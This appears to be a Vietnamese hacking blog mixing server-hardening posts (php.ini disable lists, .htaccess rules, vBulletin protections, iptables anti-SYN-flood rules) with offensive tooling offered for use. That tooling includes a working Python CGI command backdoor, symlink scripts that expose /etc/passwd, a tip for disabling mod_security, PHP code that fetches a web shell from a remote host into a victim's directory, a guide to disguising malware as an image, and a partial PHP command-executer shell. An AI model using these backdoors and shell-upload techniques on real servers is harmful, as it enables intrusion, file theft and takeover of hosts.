Saturday, March 31, 2012

Thêm cái này vào php.ini và chmod lại:
disable_functions = php_uname, getmyuid, getmypid, passthru, leak, listen, diskfreespace, tmpfile, link, ignore_user_abord, shell_exec, dl, set_time_limit, exec, system, highlight_file, source, show_source, fpaththru, virtual, posix_ctermid, posix_getcwd, posix_getegid, posix_geteuid, posix_getgid, posix_getgrgid, posix_getgrnam, posix_getgroups, posix_getlogin, posix_getpgid, posix_getpgrp, posix_getpid, posix, _getppid, posix_getpwnam, posix_getpwuid, posix_getrlimit, posix_getsid, posix_getuid, posix_isatty, posix_kill, posix_mkfifo, posix_setegid, posix_seteuid, posix_setgid, posix_setpgid, posix_setsid, posix_setuid, posix_times, posix_ttyname, posix_uname, proc_open, proc_close, proc_get_status, proc_nice, proc_terminate, phpinfo,system,passthru,shell_exec,escapeshellarg, escapeshellcmd,proc_close,proc_open,
ini_alter,dl,popen,popen,pcntl_exec,socket_accept, socket_bind,socket_clear_error,
socket_close,socket_connect
safe_mode = On
register_globals = Off
display_errors = Off
allow_url_fopen = Off
allow_url_include = Off
enable open_basedir(set it to webroot path)

Secure your server from PHP shells!

By: MIN Software on: 9:49 PM
http://nj7.upanh.com/b3.s25.d2/18023a1bc9ccd6d0cdc3f28487465e7f_41861417.123.jpg

Task Force của BKAV

By: MIN Software on: 9:46 PM
Để vào các foder file .htacces phòng tránh up shell:

<Files ~ “^.*\.(php|cgi|pl|php3|php4|php5|php6|phtml|shtml) ”>
Order allow,deny
Deny from all
</Files>
Chống scan folder:
<IfModule mod_rewrite.c>

RewriteEngine on

# Rewrite URLs of the form 'index.php?r=x'.

RewriteCond %{REQUEST_FILENAME} !-f

RewriteCond %{REQUEST_FILENAME} !-d

RewriteRule ^(.*)$ /index.php [L,QSA]

</IfModule>
<Files ~ ”\.(inc|sql|php|cgi|pl|asp|aspx|jsp|txt)$”>
order allow,deny
deny from all
</Files>

.htaccess security

By: MIN Software on: 9:41 PM
Phần I
Bài viết này Mafia viết thêm dựa trên tài liệu của shacker và một bài viết bằng tiếng Anh viết về bảo mật cho vbb. ok vào đề đi nào!

I/Bài toán 1
Tôi đưa ra một giả thiết rằng tài khoản Admin trên forum bạn bị ai đó chiếm lấy bất hợp pháp (thông qua đoán pass, cài troyzan, ăn cấp password cookie...). 

Vấn đề đặt ra ở đây là sẽ phải có một pass thứ 2 để ngăn chặn bước chân của kẻ muốn tấn công forum bạn lại chứ
Thông thường thì một số bạn dùng htaccess tôi sẽ cung cấp cho các bạn thêm một cách làm nữa:

Cách thiết lập:
Bạn edit file global.php từ thư mục admincp của diễn đàn (không phải global.php nằm bên ngoài index)
-Bạn tìm
<?php
 -Thêm vào sau đó
//Khai bao dang nhap
$config['dn2_dnp'] = 'usename';
$config['mk2_dnp'] = 'password';


if ($_SERVER['PHP_AUTH_USER'] != $config['dn2_dnp'] || $_SERVER['PHP_AUTH_PW'] != $config['mk2_dnp']){
header('WWW-Authenticate: Basic realm="Xin vui long khai bao thong tin yeu cau truoc khi duoc chuyen den bang dang nhap"');
header('HTTP/1.0 401 Unauthorized');




//Trang sẽ hiển thị khi thông tin khai báo sai bét. Hỗ trợ HTML nên bạn có thể thiết kế một trang đẹp hơn
echo '<center>Đi chổ khác chơi đi chú em. Nhấn nút biến!</center>';
exit;
}
-Save lại với mã là UTF-8

kết quả here

Bạn làm thêm một cái nữa ở modcp để bảo mật cho staff của mình luôn.

II/Bài toán 2
Hacker thông qua local biết được cấu trúc dữ liệu site bạn.
Mục đích của cuộc tấn công của hacker là đọc được file config, giả sử tôi có một file config sau:
$INFO['sql_database'] = 'ngoisaon_Forums';
$INFO['sql_driver'] = 'mySQL';
$INFO['sql_host'] = 'localhost';
$INFO['sql_pass'] = 'HANOIMUATHU';
Đây là info database của diễn đàn hacker có thể thông qua nó drop database của forum hoặc thông qua shell đổi được password của admin ~~~> nguy hiểm thật nhỉ

Cách khắc phục:
- Chmod (ko bàn ở đây)
- Zend (dùng trình zendgaurd để zend lại các file php quan trọng)
- Đổi tên thư mục include (chứa file config) và file config.php
Tôi sẽ hướng dẫn các bạn đổi tên thư mục include (chứa file config) và file config.php:

B1: Bạn edit file diagnostic.php trong thư mục admincp
-Tìm
$ignored_files = array('/includes/config.php', '/includes/config.php.new',
-Thay bằng
$ignored_files = array('/thư mục bạn muốn đổi tên/tên file config mới.php', '/thư mục bạn muốn đổi tên/tên file config mới.php.new',
B2: Bạn edit file class_core.php trong thư mục include
-Tìm
include(CWD . '/includes/config.php');
 -Thay bằng
include(CWD . '/thư mục bạn muốn đổi tên/tên file config mới.php');
-Tìm
if (file_exists(CWD. '/includes/config.php'))
-Thay bằng
if (file_exists(CWD. '/thư mục bạn muốn đổi tên/tên file config mới.php'))
- Bạn có thể chọn nhiều cách làm như thay đổi tên thư mục chứa file config hoặc thay đổi file tên file config (làm 2 cách càng tốt).
tôi khuyên các bạn nên rename tên thành class_gì đó hoặc functions_gì đó để gây thêm khó khăn về thị lực cho kẻ muốn xâm nhập
- Còn file bạn tạo một file mới với tên config.php và điền info như sau:
Lạy anh tha cho em em có làm gì nên tội thì anh hãy pm em mà trách tội em :(
Bonus cho bạn code fake bigdump mafia chôm được
demo là vipunder
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="ProgId" content="FrontPage.Editor.Document">
<title>.:: Loi roi ban ::.</title>
</head>
<body>
<table border="0" cellpadding="0" cellspacing="0" width="100%" height="162">
<tr>
<td width="33%" height="21"></td>
<td width="33%" align="center" height="21"></td>
<td width="34%" height="21"></td>
</tr>
<tr>
<td width="33%" height="75"></td>
<td width="33%" align="center" height="75"><img border="0" src="http://daoduytu.net/police.jpg"></td>
<td width="34%" height="75"></td>
</tr>
<tr>
<td width="33%" height="21"></td>
<td width="33%" align="center" height="21"></td>
<td width="34%" height="21"></td>
</tr>
<tr>
<td width="33%" height="24"></td>
<td width="33%" align="center" height="24"><font face="Arial" size="4" color="#FF0000"><b>Địa chỉ này không tồn tại hoặc bạn không được quyền truy cập!</b></font></td>
<td width="34%" height="24"></td>
<center><font color="blue" size="5">Bạn sẽ được chuyển về trang bạn vừa xem</font></center>
</tr>
<tr>
<td width="33%" height="21"></td>
<td width="33%" align="center" height="21">
<script language="javascript">
window.setInterval("history.go(-1)", 5000);
//history.go(-1);
</script>
</td>
<td width="34%" height="21"></td>
</tr>
</table>
</body>
</html>


phần II
Bài toán 3:Sau khi bạn đổi tên thư mục include (chứa file config) và file config.php thì có cách nào để che dấu file config thêm một lần nữa không nhỉ?
Câu trả lời là bạn có thể làm được nhưng làm trên host window hay linux thì bạn lưu ý như sau:
Bước 1: Xác định folder cần che dấu file config.

- Đối với host dùng linux bạn tạo 1 folder tên #data .Ý nghĩa của dấu # thì trong linux dấu # sẽ bị lướt qua => ko truy cập được
- Đối với host dùng window bạn nên che dấu file config vào các folder có sẵn như admincp, modcp, style...
Bước 2: Tiến hành quá trình che dấu.
- Tạo một file php mới với tên bất kỳ (bạn nên nghĩ ra một cái tên gần gần na ná với cấu trúc của forum vbb) ở đây tôi đặt tên là usercp.php- Tiếp theo bạn copy toàn bộ nội dung file config vào usercp.php
Bước 3:

- Xóa hết nội dung file config.php và thay bằng đoạn code
<?php include "#data/usercp.php" ?> (đối với host dùng linux)
hoặc <?php include "data/usercp.php" ?> (đối với host dùng window)
- Bây giờ file config của bạn đã được chuyển sang một folder khác với một cái tên khác.
Bước 4: Bảo mật thêm cho file config.


- Lời khuyên là bạn nên dùng host linux để có được tính năng Chmod nếu Chmod tốt thì hacker sẽ khó lòng mà xâm nhập.
- Mã Hóa file config bằng zendguard.
- Dùng MD5 để mã hóa user và pass của file config.
- Bước cuối quan trọng nhất ,CHMOD folder #data (chỉ làm bước này nếu bạn sử dụng host linux) là 111 nếu host có hỗ trợ còn không thì 711 cũng được,nếu làm đúng file sẽ mất tiêu thư mục #data y như thư mục rỗng.
- file config cũ chứa nội dung <?php include "#data/usercp.php" ?> thì bạn hãy mã hóa nó.
Bài toán 4: Để những folder như admincp, modcp thì tầm thường quá có thể nào thay đổi tên những folder này không.

Bạn làm như sau: vào file config.php tìm đoạn này và edit nó
Code:
$config['Misc']['admincpdir'] = 'admincp'; //thay nội admincp bằng tên folder mà bạn muốn đổi
$config['Misc']['modcpdir'] = 'modcp'; //thay nội modcp bằng tên folder mà bạn muốn đổi
Bài toán 5: Phương pháp chống những kẻ tò mò tọc mạch

Bạn tạo một file index.html với nội dung tùy ý ở bất cứ folder nào trong host. (kể cả mục skin, imager, và những folder con trong folder mẹ imager)

Bài toán 6: Che dấu những folder nhạy cảm.

- Bạn có thể dùng .htaccess.
- Rename các folder nhạy cảm như data, databackup, mysqldumper...
- Tạo subdomain để vào VD: sql.yourdomain.com và trỏ tới mysqldumper.
Bài toán 7: Có cách nào để phát hiện quá trình xâm nhập không nhỉ?

Câu trả lời rằng bạn hoàn toàn có thể biết trước được quá trình xâm nhập vào admincp hoặc modcp do member của diễn đàn bạn hoặc một kẻ phá hoại nào đó. Quá trình xâm nhập có thể là đoán pass.
Điều gì bạn muốn biết về quá trình xâm nhập?
Đó là nickname đang cố xâm nhập, ip của hắn, số lần cố gắn xâm nhập, thời gian diễn ra quá trình xâm nhập.
Demo: test ở diễn đàn ku LTA (mafia team)
Username tried: [l] [t] [a]
IP Address: 117.2.15.36
Host: 117.2.15.36
Strikes: 2 out of 5
Referrer: http://forum.b3pro.us/modcp/index.php
Script: http://forum.b3pro.us/login.php?do=login
Date/Time: Sunday, August 17th, 2008 at 6:43:33 am ?
==========================================
Username tried: asedfsda
IP Address: 117.2.15.36
Host: 117.2.15.36
Strikes: 1 out of 5
Referrer: http://forum.b3pro.us/modcp/index.php
Script: http://forum.b3pro.us/login.php?do=login
Date/Time: Sunday, August 17th, 2008 at 6:42:54 am
Để làm được như thế này bạn lần lượt làm theo hướng dẫn ở các bước sau nhé:

Bước 1: edit file login.php

Bạn tìm:
$strikes = verify_strike_status($vbulletin->GPC['vb_login_username']);
Và add sau nó:
$username = $vbulletin->GPC['vb_login_username'];
$fdate = date('l, F jS, Y');
$ftime = date('g:i:s a');
$fdatetime = "Date/Time: $fdate at $ftime \r\n";
$fscriptpath = "Script: http://$_SERVER[HTTP_HOST]" . SCRIPTPATH . "\r\n";
$freferer = 'Referrer: ' . REFERRER . "\r\n";
$fusername = "Username tried: $username \r\n";
$fipaddress = 'IP Address: ' . IPADDRESS . "\r\n";
$iphostname = "Host: " . @gethostbyaddr(IPADDRESS) . "\r\n";
if ($vbulletin->userinfo['userid'] > 0)
{
$realname = "\nUSER ATTEMPT: " . $vbulletin->options['bbtitle'] . " has identified this registered user as: " . $vbulletin->userinfo['username'] . "\r\n";
}
 Bước 2: vẫn ở file login.php

Bạn tìm:
// log this error if attempting to access the control panel
require_once(DIR . '/includes/functions_log_error.php');
 Thêm sau nó:
$fstrk = "Strikes: $GLOBALS[strikes] out of 5 \r\n";
if ($vbulletin->GPC['logintype'] === 'cplogin')
{
$subject= 'WARNING: Failed Admin CP logon in ' . $vbulletin->db->appname . ' ' . $vbulletin->options['templateversion'] . "\r\n\r\n";
$message="Someone is trying to login to your " . $vbulletin->options['bbtitle'] . " Admin CP!\n\n$fusername$fipaddress$iphostname$fstrk$fref erer$fscriptpath$fdatetime$realname";
}
else
{
$subject= 'WARNING: Failed Mod CP logon in ' . $vbulletin->db->appname . ' ' . $vbulletin->options['templateversion'] . "\r\n\r\n";
$message="Someone is trying to login to your " . $vbulletin->options['bbtitle'] . " Mod CP!\n\n$fusername$fipaddress$iphostname$fstrk$fref erer$fscriptpath$fdatetime$realname";
}
vbmail($vbulletin->options['webmasteremail'], $subject, $message, true);
Webmasteremail các bạn chỉnh trong VB Options nhé code sẽ tự động gởi mail thông báo quá trình xâm nhập cho bạn.
Note:
- test trên forum 3.7
- Special thanks to Boofo for this mod!
Bài toán 8: Phương pháp chống up shell wa plugin và edit plugin
Bạn chèn đoạn code này vào file config.php (sau dòng <?php)
define('DISABLE_HOOKS', true);
 Bonus: phương pháp thiết lập ở config.php để ngăn chặn việc xóa, sửa hay thêm bớt thông tin tài khoản admin
// ****** UNDELETABLE / UNALTERABLE USERS ******
// The users specified here will not be deletable or alterable from the control panel by any users.
// To specify more than one user, separate userids with commas.
$config['SpecialUsers']['undeletableusers'] = 'nhập user admin vào đây';
Vài lời khuyên là không nên dùng source share sẳn, đừng hack quá nhiều mod, đặt biệt là những mod không rõ nguồn gốc vì có thể người share mod sẽ đính kèm shell vào plugin. Đây chỉ là một vài phương pháp tạm thời để ngăn hacker, tôi đang nghiên cứu thêm giải pháp bảo mật hẹn diệp sau sẽ post tiếp.
Tut được đúc kết từ kinh nghiệm bản thân và tài liệu của các bật tiền nhân đi trước.



phần III
Bài toán 9: Admincp Fake
Tôi đặt ra một giã thiếc: hacker có được user và pasword của admin. Hacker sẽ tìm cách vào admincp của bạn để chèn thêm shell hoặc nghịch phá diễn đàn bạn. Để làm được điều đó hacker phải vào admincp của bạn, thế thì tại sao không tạo một Admincp giả để đánh lừa những ai ưa tò mò nhỉ
Cách này có thể áp dụng cho những code shop, code news và những code forum khác bạn có thể tùy biến dễ dàng.
Q: Thế thì admincp củ của tôi để đâu nhỉ?
A: Bạn hãy rename folder admincp cũ thành bất cứ tên gì miễn sao chỉ có mỗi mình bạn biết, mỗi mình bạn có thể vào
Q: Cách này có hạn chế hack không?
A: Nó chỉ hạn chế một phần, phần còn lại phụ thuộc vào mức độ bảo mật của hosting bạn.
Q: Làm thế nào mà tôi phát hiện quá trình xâm nhập?
A: Code sẽ tự động gửi email đến thông báo cho bạn mỗi khi xuất hiện quá trình xâm nhập.
Demo run code và đoạn email gửi về
PHP Code:
New Security Breach Attempt
--------------- SENDER INFORMATION ------------This message was sent to you by Admincp.IP address is: 117.2.13.17Username: X-ecpanelPassword: 123456
Bài toán 10: Secure IP
Bảo mật admincp luôn là đề tài hot nhất, việc này đã làm cho nhiều webmaster và cả hacker hao tâm tổn sức. Hum nay tôi xin giới thiệu với các bạn một giải pháp bảo mật hiệu quả cho admincp:
Công dụng của nó ngoài việc đảm bảo chỉ 1 IP được phép login vào admincp. Còn có thêm tính năng đặt biệt giúp bạn có thể dễ dàng update IP đó.
download :
 Cách làm:
- Bạn mở file capnhapip.php, chỉinh lại $pass = '12345'; cho phù hợp.
- Mở file Security, chỉnh IP Hosting của bạn.
- UP 3 file security.php, checkip.php , listip.txt vào thư mục admincp.
- Chmod File listip.txt thành 777.
- Mở file global.php và thêm vào đằng sau <?
Code:
include("security.php")
Cách sử dụng:
- Truy cập vào địa chỉ: http://yourURL.com/forum/admincp/capnhapip.php
Nhập mật khẩu của bạn để cập nhập địa chỉ IP mới.
Tip: Nên dùng Sock SSh do chính hosting của bạn tạo ra để truy cập vào admincp
download:

[TUT] - Bảo mật cho Forum vBulletin

By: MIN Software on: 9:32 PM

Bypass anti virus

By: MIN Software on: 8:21 PM
Syn flood là 1 dạng tấn công từ chối dịch vụ, kẻ tấn công gửi các gói tin kết nối SYN đến hệ thống. Đây là 1 loại tấn công rất phổ biến. Loại tấn công này sẽ nguy hiểm nếu hệ thống cấp phát tài nguyên ngay sau khi nhận gói tin SYN từ kẻ tấn công và trước khi nhận gói ACK.
Nếu việc thiết lập kết nối chưa hòan tất 3 bước đây đủ (gọi là half-open connection) mà buộc hệ thống server phải cấp tài nguyên để quản lý thì kẻ tấn công có thể lấy hết tài nguyên của hệ thống server bằng các “flooding” vào server với các gói tin SYN. Syn flood là 1 dạng tấn công phổ biến và nó có thể được ngăn chặn bằng đoạn lệnh iptables sau:
Mã:
iptables -A INPUT -p tcp --syn -m limit --limit 1/s --limit-burst 3 -j RETURN
Tất cả các kết nối đến hệ thống chỉ được phép theo các thông số giới hạn sau:
–limit 1/s: Tốc độ truyền gói tin trung bình tối đa 1/s (giây)
–limit-burst 3: Số lượng gói tin khởi tạo tối đa được phép là 3

Dùng iptables, thêm rule sau vào:
Trích:
# Limit the number of incoming tcp connections
# Interface 0 incoming syn-flood protection
iptables -N syn_flood
iptables -A INPUT -p tcp –syn -j syn_flood
iptables -A syn_flood -m limit –limit 1/s –limit-burst 3 -j RETURN
iptables -A syn_flood -j DROP
iptables -I INPUT -p tcp -s 0/0 -d $SERVER_IP –sport 513:65535 –dport 22 -m state –state NEW,ESTABLISHED -m recent –set -j ACCEPT iptables -I INPUT -p tcp –dport 22 -m state –state NEW -m recent –update –seconds 600 –hitcount 11 -j DROP
iptables -A OUTPUT -p tcp -s $SERVER_IP -d 0/0 –sport 22 –dport 513:65
#!/bin/bash
IPT=/sbin/iptables
SPAMLIST=”spamlist”
SPAMDROPMSG=”SPAM LIST DROP”
BADIPS=$(egrep -v -E “^#|^$” /root/iptables/blocked.ips)
# create a new iptables list
$IPT -N $SPAMLIST
for ipblock in $BADIPS
do
$IPT -A $SPAMLIST -s $ipblock -j LOG –log-prefix “$SPAMDROPMSG”
$IPT -A $SPAMLIST -s $ipblock -j DROP
done
$IPT -I INPUT -j $SPAMLIST
$IPT -I OUTPUT -j $SPAMLIST
$IPT -I FORWARD -j $SPAMLIST
#!/bin/bash
# Ban quyen thuoc ve Hanh_bk
/etc/init.d/iptables start
cd /root/iptables
netstat -atun | grep SYN_RECV | awk ‘{print $5}’ | cut -d: -f1 |sort | uniq -d | sort -n > blocked.ips
sh ./iptables.sh

Sử dụng Iptables chống Syn Flood attacks và cấm IP

By: MIN Software on: 8:19 PM
Cơ chế:
Khi 1 ip gửi 1 request tới site của bạn. code sẽ tạo ra 1 file log ghi lại ip đó, và url mà ip đó truy cập.

Ví dụ : 113.22.70.69 - http://mydomain.com/4rum/index.php
nếu ip 113.22.70.69 truy cập nhanh và liên tiếp 5 lần vào cùng 1 url như trên thì code sẽ lock ip 113.22.70.69 bằng cách tạo ra 1 file htaccess
và ghi lệnh deny from 113.22.70.69
Soạn thảo 1 file : banip.php

<?php
$n = 5; // Chặn ip nếu 5 lần nhanh và liên tiếp truy cập vào 1 URL
$ban = strpos($_SERVER***91;'REQUEST_URI'***93;, "vbshout.php")?0:1;
$in = "\n".$_SERVER***91;'REMOTE_ADDR'***93;." - ".$_SERVER***91;'REQUEST_URI'***93;;
$log = fopen('banip.log','a'); fwrite($log, $in); fclose($log);
$list = file('banip.log',FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
$last = count($list) - 1;
if($last >1000) { $in = "Deny from all"."\n";
$lock = fopen('.htaccess','a'); fwrite($lock, $in); fclose($lock); }
elseif($last > $n) { for($i = 1; $i < $n; $i++) if($list***91;$last - $i***93; != $list***91;$last***93 $ban = 0;
} else { $ban = 0; }
if($ban) { $in = "Deny from ".$_SERVER***91;'REMOTE_ADDR'***93;."\n";
$lock = fopen('.htaccess','a'); fwrite($lock, $in); fclose($lock);}
?>
Edit :global.php ( Nếu là Forum) thêm vào
include 'banip.php';
Đoạn code này :
if($last >1000) { $in = "Deny from all"."\n";
........
Khi 1 ip truy cập vào site. code sẽ ghi ip đó vào 1 dòng
Sau đó sẽ đếm tổng số dòng trong file log. nếu lớn hơn 1000 dòng trong 1 thời gian nhất định (Dấu hiệu bị tấn công bonet) thì sẽ ghi vào file
htaccess lệnh deny from all.Các bạn có thể lập lịch xoá file htaccess và file log theo 1 thời gian quy định bằng cron job trong cpanel của host
reset.php
<?php
if(file_exists('.htaccess')) unlink('.htaccess');
if(file_exists('banip.log')) unlink('banip.log');
?>
Sau đó dùng chức năng cron job của cpanel mà trỏ về reset.php .ví dụ 5 phút nó sẽ xóa file hta và log
Name:  job.jpg Views: 152 Size:  15.9 KB

Tự động lock ip khi bị ddos attack

By: MIN Software on: 8:16 PM
Nmap là công cụ quyét cổng hàng đầu, được các hacker, các nhà đánh giá an ninh mạng, các nhà quản trị mạng hay sử dụng cho công việc của mình. Sau đây là bài lược dịch về Nmap từ Nmap reference guide, nằm trong trang web chính thức của Nmap (Nmap.org):
Phần 1:Các trạng thái cổng được Nmap nhận dạng:
- Cổng mở (open):
Trong trường hợp này, ứng dụng web chủ động chấp nhận kết nối TCP, và 1 số giao thức khác như UDP datagram,SCTP association trên cổng được thăm dò. Tìm cổng mở là mục tiêu hàng đầu của quyét cổng. Một người hiểu biết về an ninh mạng hiểu rằng mỗi một cổng mở là lối vào cho cuộc tấn công. Những kẻ tấn công, những nhà đánh giá an ninh mạng đều muốn khai thác cổng mở, trong khi các nhà quản trị lại cố gắng đóng hoặc bảo vệ chúng bằng tường lửa mà không ngăn cản những người dùng hợp pháp. Các cổng mở cũng là mối quan tâm của các loại quyét cổng không liên quan đến an ninh mạng vì chúng cho thấy dịch vụ nào đang sẵn sàng cho sử dụng trên mạng.
- Cổng đóng (closed):
Một cổng đóng là cổng vẫn có thể vào được ( nó nhận và trả lời với các gói dữ liệu thăm dò của Nmap), nhưng không một chương trình ứng dụng nào "lắng nghe" (listening) ở cổng đó. Các cổng đóng có thể hữu dụng trong việc cho thấy 1 host đang hoạt động trên 1 địa chỉ IP ( thăm dò host hoặc quyét ping) hoặc khi là một phần của công việc phát hiện hệ điều hành. Vì một cổng đóng có thể đến được, nó có thể có ích cho những lần quyét sau trong trường hợp nó được mở. Các nhà quản trị có thể muốn xem xét khoá những cổng như vậy bằng tường lửa.
- Cổng có lọc ( filtered):
Trong trường hợp này, Nmap không thể quyết định xem một cổng có phải là đang mở hay không vì bộ phận lọc dữ liệu ngăn chặn sự do thám của nó đến cổng. Bộ phận lọc này có thể từ một thiết bị tường lửa, một router có định chế, hay một phần mềm tường lửa nằm trên host .Những cổng loại này làm thất vọng những kẻ tấn công vì chúng cung cấp quá ít thông tin. Đôi khi chúng trả lời với một thông báo lỗi ICMP như dạng 3 ,code 13( cổng đích không thể đến được hay trao đổi thông tin bị quản trị ngăn chặn), nhưng thường thì bộ phận lọc dữ liệu sẽ bỏ qua các gói dữ liệu thăm dò mà không trả lời bất cứ điều gì. Điều này bắt buộc Nmap phải quyét thử lại vài lần để xem xem gói dữ liệu thăm dò bị bỏ qua là do nghẽn mạng hay là do có lọc (filtered). Việc trên làm giảm tốc độ quyét mạnh mẽ.
- Cổng có thể vào được (unfiltered):
Trạng thái "unfiltered" có nghĩa là cổng có thể vào được. Nhưng Nmap không thể quyết định xem nó mở hay đóng .Chỉ có quyét dạng ACK , cái thăm dò các định chế của tường lửa mới phân chia port ra loại này. Quyét cổng loại này với các dạng quyét như quyét Window, quyét Syn, hay quét Fin, sẽ có thể giải quyết là cổng có mở hay không.
- Open/filtered:
Nmap đặt các cổng vào trạng thái này khi nó không thể quyết định xem một cổng là mở hay là có lọc. Điều này xảy ra cho dạng quyét trong đó cổng mở không trả lời. Không có câu trả lời cũng có nghĩa là bộ phận lọc dữ liệu đã bỏ qua gói dữ liệu thăm dò của Nmap hoặc bất cứ câu trả lời nào mà Nmap khai thác được. Vì vậy Nmap sẽ không thể biết được cổng là mở hay là có lọc. Quyét UDP, IP protocol, Fin,và Xmas sẽ phân cổng vào trạng thái này.
- Closed/filtered:
Trạng thái này được sử dụng khi Nmap không thể quyết định xem một cổng là đóng hay là có lọc. Nó chỉ được sử dụng cho dạng quyét IP ID

About NMap

By: MIN Software on: 8:59 AM
Trong Win 7, Telnet bị disable. Vì thế muốn Enable Telnet ta làm như sau:
Vào Control Panel > Programs and Features > Turn Windows features on or off. Check vào check box Telnet Client > Ok.
Enjoy! :)

Telnet trong windows 7

By: MIN Software on: 8:56 AM

Ebook Sổ Tay Hacker 1.0

By: MIN Software on: 8:52 AM
Bạn muốn người sử dụng Click vào Malware của bạn.... sau đây là 2 cách mình thấy hiệu quả.
Bạn có thể đổi theo filetype tùy tích của bạn.. ở TUT này.. mình dùng dạng .jpg (file ảnh)

Nguyên liệu :
Đây là 1 code nhỏ mình viết bằng VB6 . . khi chạy thì show 1 đoạn Msgbox (đặt tên là solana.exe)


Cách thứ nhất: Thông qua cmd + shortcut
- Bạn tạo shortcut, thay đổi thuộc tính của Shortcut và đổi tên Malware thành .jpg





- Đổi icon của shortcut
- Thành quả


ở đây, khi click.. bạn sẽ chạy 1 cửa sổ cmd sau đó... Malware được chạy

Cách thứ hai: Thông qua đổi tên ngược + đổi icon trong source








bạn làm như hình vẽ và... ở bước cuối Dùng Reshack hoặc 1 tool tương tự để đổi icon

Kết:
Có nhiều cách thức khác nữa, bạn có thể tìm kiếm thêm ở Google

Mình cũng đã viết thành tut dạng pdf để các mem khác có thể ngâm cứu offline

Link download: http://www.mediafire.com/?tqtlisffcjil1l9
Pass: solana_BYG

[TUT] Malware dưới dạng file Ảnh

By: MIN Software on: 6:58 AM

[TUT] - Local BSG.vn

By: MIN Software on: 5:43 AM

Friday, March 30, 2012

    [+] Đầu tiên ta hãy tìm hiểu xem cái open_basedir là cái wtf gì
    http://id.php.net/manual/en/ini.core...i.open-basedir
    Tạm dịch
    Nó hạn chế quyền xem các tập tin và thư mục của ta , dù safe_mode on hay off cũng không ảnh hưởng tới giá trị này
   
    [+] Cách khai thác đối với
    PYTHON
   
    Name:  1.jpgViews: 19Size:  28.5 KB
   
    Ở đây ta không thể chuyển sang thư mục /var/www vì đã bị Open_BaseDir chặn lại
   
    Name:  2.jpgViews: 19Size:  35.0 KB
   
    Run command
    python webs.py
    Kết quả:
   
    Name:  3.jpgViews: 19Size:  26.4 KB 

Perl, Python, Ruby bypass Open_BaseDir

By: MIN Software on: 9:34 PM
.htacesss

Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .nothing

AddHandler cgi-script .nothing
AddHandler cgi-script .nothing
Forbidden.nothing
#!/usr/bin/python
print "Content-type: text/html\n\n"

import os
filename = "nothing.txt" #dst
linkto = "/etc/passwd" #source
os.symlink(linkto, filename)

Symlink Python Forbidden Bypass

By: MIN Software on: 9:18 PM
  
#!/usr/bin/env python
# Info : Linux based CGI backdoor with python
# author: otoy
# date : 0x102010

import cgi,os,re,sys

form = cgi.FieldStorage()
cmd = form.getvalue('cmd', '')
osexe = os.popen(cmd)

dirt = os.getcwd()+'/'
prognm = sys.argv[0].strip()
progfl = re.findall(dirt+'(.*)',prognm)[0]

osinf = os.uname()
info='''====================================
CGI python backdoor
====================================
Author : otoy
Date : 0x102010
Blog : <a href="http://otoyrood.wordpress.com" target="_blank">otoyrood.wordpress.com</a>
====================================
System : %s %s
====================================
''' %(osinf[0], osinf[2])

print "Content-type: text/html"
print

print"""
<html>
<head>
<title>CGI python backdoor</title>
</head>
<body>
<pre>%s</pre>
<form action='%s'>
Command <input type='text' name='cmd' />
<input type='submit' />
</form>
<pre>%s</pre>
</body>
</html>
""" %(info,progfl,osexe.read())

CGI python backdoor

By: MIN Software on: 9:14 PM
.htaccess

Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .nothing

AddHandler cgi-script .nothing
AddHandler cgi-script .nothing
shell.nothing
#!/usr/bin/python
print "Content-type: text/html\n\n"
import os filename = "nothing.txt"
#dst linkto = "/etc/passwd"
#source os.symlink(linkto, filename) 
Symlink bằng pynthon anh em sài, nếu PHP ko chạy.

Python Symlink Bypass

By: MIN Software on: 9:12 PM

Tut Bypass safemod voi Python shell

By: MIN Software on: 9:09 PM
Khi local đôi khi ta bị 500 hoặc 400 khi đó con shell đã bị mod_security chộp được làm sao để bypass nó nhỉ?

[+] tùy biến lệnh
[+] encode các string
[+] Tắt mod_security đi (trong thư mục đó bằng file .htaccess)
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

Bypass mod_security thế nào?

By: MIN Software on: 9:06 PM
Mẫu code dùng để up shell server có safe mode đang ON vì lúc đó ko thể dùng các hàm system,exec,shell_exec...
<?php
touch(ugvn.php);
chmod("ugvn.php", 0755);
$fin=fopen("http://www.vietnamsvisa.com/media/system/css/ugvn.txt",r)or exit("false 1");
$fout=fopen("/home/victim/domains/victim.com/public_html/admin/ugvn.php",a)or exit("false 2");
while(!feof($fin))
{
fwrite($fout,fgets($fin));
}fclose($fin);
fclose($fout);
?> 
or
<?php
touch(ugvn.php);
chmod("ugvn.php", 0755);
$fout=fopen("/home/victim/domains/victim.com/public_html/admin/ugvn.php",a)or exit("false");
fwrite($fout,file_get_contents(http://www.vietnamsvisa.com/media/sy...ss/ugvn.txt));
fclose($fout 
[+] http://www.vietnamsvisa.com/media/system/css/ugvn.txt <--- là link shell ở 1 host nào đó,up lên nhớ xem có quyền đọc ko đã nhé


[+] /home/victim/domains/victim.com/public_html/admin/ugvn.php <--- là vị trí shell đc đẩy vào host,hảy chắc chắn là ta có quyền ghi file ở đó nhé!

Up shell safe mode

By: MIN Software on: 9:05 PM
<body bgcolor=black>
<center><font color=green>COMMAND EXECUTER (CODED BY NEO)</font></center>
<div align="center"><center>
<table width="558" height="560" border="1" id="AutoNumber1">
<tr>
<td width="49%" height="158"><p><?php
//is safe mod on ? start
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safe="<font color=red>ON</font>";
}
else {$safe="<font color=green>OFF</font>";}
echo "<font color=whitepurple>SAFE MOD IS :</font><b>$safe</b><br>";
//open safe mod end--
?>

<p>
<?php
//is open basedir on ? start
$n = @ini_get('open_basedir');
if (!empty($n))
{
$base = @ini_restore("open_basedir");
}
else {$base="<font color=green>NONE</font>";}
echo "<font color=whitepurple>OPEN_BASEDIR :</font><b>$base</b><br>";
//open basedir end--
?>

<p align="left">
<?php
//disable function start
echo "<font color=whitepurple>Disable functions :</font> <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
//disable function end--
?>
<p align="left">
<?php
//phpver start
$phpver=phpversion();
